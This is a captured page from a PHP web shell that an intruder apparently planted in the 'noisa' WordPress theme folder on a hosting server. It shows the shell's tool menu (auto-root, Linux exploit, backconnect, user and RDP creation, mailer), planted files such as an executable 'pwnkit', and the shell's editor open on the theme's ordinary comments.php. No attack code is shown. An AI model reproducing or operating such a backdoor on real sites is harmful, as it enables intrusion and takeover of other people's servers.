Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
TF89388 /
wp-content /
themes /
noisa /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
vc_templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1021
B
-rw-r--r--
archive.php
2.28
KB
-rw-r--r--
author.php
2.29
KB
-rw-r--r--
category.php
2.28
KB
-rw-r--r--
comments.php
4.94
KB
-rw-r--r--
content-custom.php
484
B
-rw-r--r--
content-page.php
599
B
-rw-r--r--
content-search.php
2.35
KB
-rw-r--r--
content-single.php
753
B
-rw-r--r--
content.php
11.43
KB
-rw-r--r--
footer.php
1.46
KB
-rw-r--r--
functions-extended.php
16.18
KB
-rw-r--r--
functions.php
25.77
KB
-rw-r--r--
header.php
4.85
KB
-rw-r--r--
index.php
1.88
KB
-rw-r--r--
page.php
1.33
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
0
B
-rw-r--r--
screenshot.png
496.33
KB
-rw-r--r--
search.php
2.27
KB
-rw-r--r--
searchform.php
356
B
-rw-r--r--
sidebar-category.php
498
B
-rw-r--r--
sidebar-custom.php
1.13
KB
-rw-r--r--
sidebar-footer-col1.php
446
B
-rw-r--r--
sidebar-footer-col2.php
446
B
-rw-r--r--
sidebar-footer-col3.php
446
B
-rw-r--r--
sidebar-slidebar.php
441
B
-rw-r--r--
sidebar.php
484
B
-rw-r--r--
single-noisa_artists.php
1.71
KB
-rw-r--r--
single-noisa_events.php
1.74
KB
-rw-r--r--
single-noisa_gallery.php
5.98
KB
-rw-r--r--
single-noisa_releases.php
1.74
KB
-rw-r--r--
single.php
1.74
KB
-rw-r--r--
style.css
147.06
KB
-rw-r--r--
tag.php
2.27
KB
-rw-r--r--
taxonomy.php
14.91
KB
-rw-r--r--
woocommerce.php
2.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * Theme Name: Noisa * Theme Author: Mariusz Rek - Rascals Themes * Theme URI: http://rascalsthemes.com/noisa * Author URI: http://rascalsthemes.com * Filde: comments.php * @package noisa * @since 1.0.0 */ ?> <section id="comments" class="comments-section"> <div class="container"> <?php if ( post_password_required() ) : ?> <p class="comment-message"><?php esc_html_e( 'This post is password protected. Enter the password to view any comments.', 'noisa' ); ?></p> </div></section> <?php return; endif; ?> <?php if ( have_comments() ) : ?> <h4 class="comments-title"><?php printf( _n( '1 comment on "%2$s"', '%1$s comments on "%2$s"', get_comments_number(), 'noisa' ), number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>', 'noisa' ); ?></h4> <div class="comments-container clearfix"> <ul class="comment-list"> <?php wp_list_comments( array( 'type' => 'all', 'short_ping' => true, 'callback'=> 'noisa_comments' ) ); ?> </ul> <nav class="comments-navigation" role="navigation"> <div class="nav-prev"><?php previous_comments_link(); ?></div> <div class="nav-next"><?php next_comments_link(); ?></div> </nav> </div> <?php else : // there are no comments so far ?> <?php if ( comments_open() ) : ?> <!-- If comments are open, but there are no comments. --> <p class="comment-message"><?php esc_html_e( 'Currently there are no comments related to this article. You have a special honor to be the first commenter. Thanks!', 'noisa' ); ?></p> <?php else : // comments are closed ?> <!-- If comments are closed. --> <p class="comment-message"><?php esc_html_e( 'Comments are closed.', 'noisa' ); ?></p> <?php endif; ?> <?php endif; ?> <?php $fields = array(); function custom_fields( $fields ) { global $comment_author, $comment_author_email, $comment_author_url; $consent = empty( $commenter['comment_author_email'] ) ? '' : 'checked="checked"'; $fields['author'] = '<div class="col-1-3"> <label for="author">' . esc_html__('Name*', 'noisa' ) . '</label> <input type="text" name="author" id="author" value="' . $comment_author . '" size="22" tabindex="1" required /> </div>'; $fields['email'] = '<div class="col-1-3"> <label for="email">' . esc_html__('Email*', 'noisa' ) . '</label> <input type="text" name="email" id="email" value="' . $comment_author_email . '" size="22" tabindex="2" required /> </div>'; $fields['url'] = '<div class="col-1-3 last"> <label for="url">' . esc_html__('Website URL', 'noisa' ) . '</label> <input type="text" name="url" id="url" value="' . $comment_author_url . '" size="22" tabindex="3" /> </div>'; $fields['cookies'] = '<div class="clear"></div><div class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"' . $consent . ' />' .'<label for="wp-comment-cookies-consent">' . esc_html__( 'Save my name, email, and website in this browser for the next time I comment.', 'noisa' ) . '</label></div>'; return $fields; } add_filter('comment_form_default_fields', 'custom_fields'); $form_fields = array( 'fields' => apply_filters( 'comment_form_default_fields', $fields ), 'title_reply' => '<strong>' . esc_html__('Leave', 'noisa') .' </strong>' . esc_html__(' a Reply', 'noisa'), 'title_reply_to' => '<strong>' . esc_html__('Leave', 'noisa') .' </strong>' . esc_html__(' a Reply', 'noisa'), 'cancel_reply_link' => esc_html__('(Click here to cancel reply)', 'noisa'), 'comment_notes_before' => '', 'label_submit' => esc_html__('Post Comment', 'noisa'), 'comment_notes_after' => '<p class="form-allowed-tags">' . esc_html__('* Your email address will not be published.', 'noisa') . '<br/>' . sprintf( esc_html__('You may use these HTML tags and attributes: %s', 'noisa'), ' <span>' . allowed_tags() . '</span>' ) . '</p>', 'comment_field' => '<div class="comment-field"> <label for="comment">' . esc_html__('Your Comment (required)', 'noisa') . '</label> <textarea tabindex="4" rows="9" id="comment" name="comment" class="textarea" required></textarea> </div>', ); ?> <?php comment_form( $form_fields ); ?> </div> </section> <!-- #comments -->
Close